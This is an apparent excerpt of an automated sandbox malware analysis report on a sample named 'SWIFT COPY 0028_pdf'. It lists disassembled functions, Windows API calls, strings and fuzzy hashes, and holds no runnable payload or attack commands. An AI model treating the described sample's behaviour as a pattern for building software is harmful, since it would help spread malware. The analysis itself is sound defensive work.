                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                    • String ID:
                                                                                    • API String ID: 3096461208-0
                                                                                    • Opcode ID: 09691977ab5b518d8cbb179901f18c3a2fee1afbe5c442944eca949e975bb920
                                                                                    • Instruction ID: 5c5fc85cfdcce94e9e2475872d50cfa54e33853582b01a4315fa930efc1e7fc0
                                                                                    • Opcode Fuzzy Hash: 09691977ab5b518d8cbb179901f18c3a2fee1afbe5c442944eca949e975bb920
                                                                                    • Instruction Fuzzy Hash: 5A513271B10205AFDB18CF69DD85AAEBBBAFF89301F14812DF91AD7290D7719E048B50
                                                                                    Function 0093B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0093B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0093B759,?,00000000,?,?,?,?,0093B72B,00000000,?), ref: 0093BA58
                                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0093B72B), ref: 0093B7F6
                                                                                    • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0093B72B,00000000,?,?,0093B2EF,?,?), ref: 0093B88D
                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 0099D8A6
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0093B72B,00000000,?,?,0093B2EF,?,?), ref: 0099D8D7
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0093B72B,00000000,?,?,0093B2EF,?,?), ref: 0099D8EE
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0093B72B,00000000,?,?,0093B2EF,?,?), ref: 0099D90A
                                                                                    • DeleteObject.GDI32(00000000), ref: 0099D91C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                    • String ID:
                                                                                    • API String ID: 641708696-0
                                                                                    • Opcode ID: 40874316a43bf70befae07f2f79a2530568830986197699f2f5d0f81646caaaa
                                                                                    • Instruction ID: 313c5848ab26bbc36f096c6f8e9373eef4790748bbe1195e0c1ee8314c7d6aef
                                                                                    • Opcode Fuzzy Hash: 40874316a43bf70befae07f2f79a2530568830986197699f2f5d0f81646caaaa
                                                                                    • Instruction Fuzzy Hash: C6618930516640DFDB26AF19D9C8B65B7F9FF95716F14051DE2868AA60C734AC80EF80
                                                                                    Function 0093B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0093B526: GetWindowLongW.USER32(?,000000EB), ref: 0093B537
                                                                                    • GetSysColor.USER32(0000000F), ref: 0093B438
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ColorLongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 259745315-0
                                                                                    • Opcode ID: 65c534ea9c3f631efa6d338f196066ce185f65d2657e8f0ca086bbcf89aef598
                                                                                    • Instruction ID: 6bb67d2351a948edea6f82dd2f05c772a59546df5689c0659a52c15067aedaad
                                                                                    • Opcode Fuzzy Hash: 65c534ea9c3f631efa6d338f196066ce185f65d2657e8f0ca086bbcf89aef598
                                                                                    • Instruction Fuzzy Hash: 1C41F330109144AFDF245F28DC89BB93B6AAF06731F184265FE668E5F6C7318C41EB65
                                                                                    Function 0096690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                    • String ID:
                                                                                    • API String ID: 136442275-0
                                                                                    • Opcode ID: 34d55936fb717d0b5b2efa33f4cd9cb97dde5586b556893d6e86b9b312e570b0
                                                                                    • Instruction ID: 6dce46570073e7280ad24bf8eabc8ae883df631fea5e0e83f65455a4cca288ba
                                                                                    • Opcode Fuzzy Hash: 34d55936fb717d0b5b2efa33f4cd9cb97dde5586b556893d6e86b9b312e570b0
                                                                                    • Instruction Fuzzy Hash: FC41E17684521CAECF61DB94CC85DDF73BCEB84310F0041A6B659A2091EB71ABE98F51
                                                                                    Function 0096D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharLowerBuffW.USER32(009BDC00,009BDC00,009BDC00), ref: 0096D7CE
                                                                                    • GetDriveTypeW.KERNEL32(?,009D3A70,00000061), ref: 0096D898
                                                                                    • _wcscpy.LIBCMT ref: 0096D8C2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                    • API String ID: 2820617543-1000479233
                                                                                    • Opcode ID: 9349ea997451e484c2e7595823a2e3360c2fedbbbbed7df86874107a2143a7f0
                                                                                    • Instruction ID: 45d5eb2d441f301eb9c20182b1a8b3772c2769c8454f02f42b7aa20c278e59f3
                                                                                    • Opcode Fuzzy Hash: 9349ea997451e484c2e7595823a2e3360c2fedbbbbed7df86874107a2143a7f0
                                                                                    • Instruction Fuzzy Hash: 04519275649300AFC710EF14D892BAEB7A5EFD4314F10892EF5AA572A2DB31DD05CA82
                                                                                    Function 0092936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __swprintf.LIBCMT ref: 009293AB
                                                                                    • __itow.LIBCMT ref: 009293DF
                                                                                      • Part of subcall function 00941557: _xtow@16.LIBCMT ref: 00941578
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __itow__swprintf_xtow@16
                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                    • API String ID: 1502193981-2263619337
                                                                                    • Opcode ID: 848dee6faa485f4f6ebdd637eb20a72cdbab3fb56994232a487b883baf66f0ee
                                                                                    • Instruction ID: 2499f6cc78fd7d21affdec0dfa25f2c85a6592506a950668df1c3f2ae4bf9180
                                                                                    • Opcode Fuzzy Hash: 848dee6faa485f4f6ebdd637eb20a72cdbab3fb56994232a487b883baf66f0ee
                                                                                    • Instruction Fuzzy Hash: 4741D8719042149FDB25DF78E951FAA73E8EF88300F20486EF18AD71D5EA35D942CB51
                                                                                    Function 0098A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0098A259
                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0098A260
                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0098A273
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0098A27B
                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0098A286
                                                                                    • DeleteDC.GDI32(00000000), ref: 0098A28F
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0098A299
                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0098A2AD
                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0098A2B9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                    • String ID: static
                                                                                    • API String ID: 2559357485-2160076837
                                                                                    • Opcode ID: 3cdd9e988a777038ea598b3dfd4e2d7bc2573ecda2784e613a2f55d32f782e80
                                                                                    • Instruction ID: ecd0a41f5edffdd726080fe7d0bd40dc5798177feaddf8769c09d05c730f5108
                                                                                    • Opcode Fuzzy Hash: 3cdd9e988a777038ea598b3dfd4e2d7bc2573ecda2784e613a2f55d32f782e80
                                                                                    • Instruction Fuzzy Hash: BD317E31115115BBEF21AFA4DC49FEA3B6DFF0E760F100215FA2AA61A0C735D811EBA5
                                                                                    Function 00966F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                    • String ID: 0.0.0.0
                                                                                    • API String ID: 2620052-3771769585
                                                                                    • Opcode ID: 9ef3e5a0575a8c307fdd60573401444b7b2a9f00ac0129ee75ab36b206b78a43
                                                                                    • Instruction ID: f70eef9192b425e5f40fb51e5430fef54032feb9071e9a4bb205a73de11147a4
                                                                                    • Opcode Fuzzy Hash: 9ef3e5a0575a8c307fdd60573401444b7b2a9f00ac0129ee75ab36b206b78a43
                                                                                    • Instruction Fuzzy Hash: 4511E971908215AFDB24AB70EC4AFDA77BCEF85714F000069F14AA6091FF74DE859B91
                                                                                    Function 0094500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00945047
                                                                                      • Part of subcall function 00947C0E: __getptd_noexit.LIBCMT ref: 00947C0E
                                                                                    • __gmtime64_s.LIBCMT ref: 009450E0
                                                                                    • __gmtime64_s.LIBCMT ref: 00945116
                                                                                    • __gmtime64_s.LIBCMT ref: 00945133
                                                                                    • __allrem.LIBCMT ref: 00945189
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009451A5
                                                                                    • __allrem.LIBCMT ref: 009451BC
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009451DA
                                                                                    • __allrem.LIBCMT ref: 009451F1
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0094520F
                                                                                    • __invoke_watson.LIBCMT ref: 00945280
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                    • String ID:
                                                                                    • API String ID: 384356119-0
                                                                                    • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                    • Instruction ID: 6bec393a8527019fa74d648322aebfb403d15e0659f25d87fedb83e0e60f7af5
                                                                                    • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                    • Instruction Fuzzy Hash: 7571F676A00F16ABE714DFB9CC41F6AB3A8AF45764F15422AF914D6282E770DD408BD0
                                                                                    Function 00964DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00964DF8
                                                                                    • GetMenuItemInfoW.USER32(009E1708,000000FF,00000000,00000030), ref: 00964E59
                                                                                    • SetMenuItemInfoW.USER32(009E1708,00000004,00000000,00000030), ref: 00964E8F
                                                                                    • Sleep.KERNEL32(000001F4), ref: 00964EA1
                                                                                    • GetMenuItemCount.USER32(?), ref: 00964EE5
                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00964F01
                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00964F2B
                                                                                    • GetMenuItemID.USER32(?,?), ref: 00964F70
                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00964FB6
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00964FCA
                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00964FEB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                    • String ID:
                                                                                    • API String ID: 4176008265-0
                                                                                    • Opcode ID: 76fedd87c9fa7ada16c16944583038ddca0b0b780b8bb1efc3eead3c220ad31d
                                                                                    • Instruction ID: 0018758ecb2d11ac8570a1c9bde33acbbb5177853f623c586a63f47911667fe6
                                                                                    • Opcode Fuzzy Hash: 76fedd87c9fa7ada16c16944583038ddca0b0b780b8bb1efc3eead3c220ad31d
                                                                                    • Instruction Fuzzy Hash: 56619BB1A14289EFDB21CFE4DC88EAE7BB8FB41308F140459F842A7251E731AD45DB60
                                                                                    Function 00989C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00989C98
                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00989C9B
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00989CBF
                                                                                    • _memset.LIBCMT ref: 00989CD0
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00989CE2
                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00989D5A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$LongWindow_memset
                                                                                    • String ID:
                                                                                    • API String ID: 830647256-0
                                                                                    • Opcode ID: 0af0496efc2eaa3bdd2804be8c1bb2ac96e2979abb04997174e2d04a1a3070d7
                                                                                    • Instruction ID: 7fdac005471fb3f33aed245a3d1d33302e11de18fa9b45a87f1078f9e3a9e083
                                                                                    • Opcode Fuzzy Hash: 0af0496efc2eaa3bdd2804be8c1bb2ac96e2979abb04997174e2d04a1a3070d7
                                                                                    • Instruction Fuzzy Hash: 1E616875900248AFDB11DFA8CC81EFEB7B8EB49704F14415AFA05AB392D774AD41DB50
                                                                                    Function 009594E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 009594FE
                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00959549
                                                                                    • VariantInit.OLEAUT32(?), ref: 0095955B
                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 0095957B
                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 009595BE
                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 009595D2
                                                                                    • VariantClear.OLEAUT32(?), ref: 009595E7
                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 009595F4
                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009595FD
                                                                                    • VariantClear.OLEAUT32(?), ref: 0095960F
                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0095961A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                    • String ID:
                                                                                    • API String ID: 2706829360-0
                                                                                    • Opcode ID: 84f9d296aaa44c5564574e2165fd1d6a06921a540c67924a6137cf97c08240c3
                                                                                    • Instruction ID: 1fc9b15e93241a8f4ceebee2101fe2bd72e5779e8d9385b5b2553e0de4a3cf02
                                                                                    • Opcode Fuzzy Hash: 84f9d296aaa44c5564574e2165fd1d6a06921a540c67924a6137cf97c08240c3
                                                                                    • Instruction Fuzzy Hash: FB416E71905219EFDF01DFA4D8449DEBFB9FF49355F008065F902A3261DB30AA4ADBA0
                                                                                    Function 0097ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
                                                                                      • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
                                                                                    • CoInitialize.OLE32 ref: 0097ADF6
                                                                                    • CoUninitialize.OLE32 ref: 0097AE01
                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,009AD8FC,?), ref: 0097AE61
                                                                                    • IIDFromString.OLE32(?,?), ref: 0097AED4
                                                                                    • VariantInit.OLEAUT32(?), ref: 0097AF6E
                                                                                    • VariantClear.OLEAUT32(?), ref: 0097AFCF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                    • API String ID: 834269672-1287834457
                                                                                    • Opcode ID: 7c46ffc1b1336a572c86bda75849665b221668561403c640dbac27c966639914
                                                                                    • Instruction ID: 025dd984c0087c7fc57473c3714793f24e0e3852e9b7a98c4a52fa1fa5e88529
                                                                                    • Opcode Fuzzy Hash: 7c46ffc1b1336a572c86bda75849665b221668561403c640dbac27c966639914
                                                                                    • Instruction Fuzzy Hash: 71618C722083119FD710DF64D848B6EBBE8AFC9714F108919F98A9B291D774ED44CB93
                                                                                    Function 00978107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00978168
                                                                                    • inet_addr.WSOCK32(?,?,?), ref: 009781AD
                                                                                    • gethostbyname.WSOCK32(?), ref: 009781B9
                                                                                    • IcmpCreateFile.IPHLPAPI ref: 009781C7
                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00978237
                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0097824D
                                                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009782C2
                                                                                    • WSACleanup.WSOCK32 ref: 009782C8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                    • String ID: Ping
                                                                                    • API String ID: 1028309954-2246546115
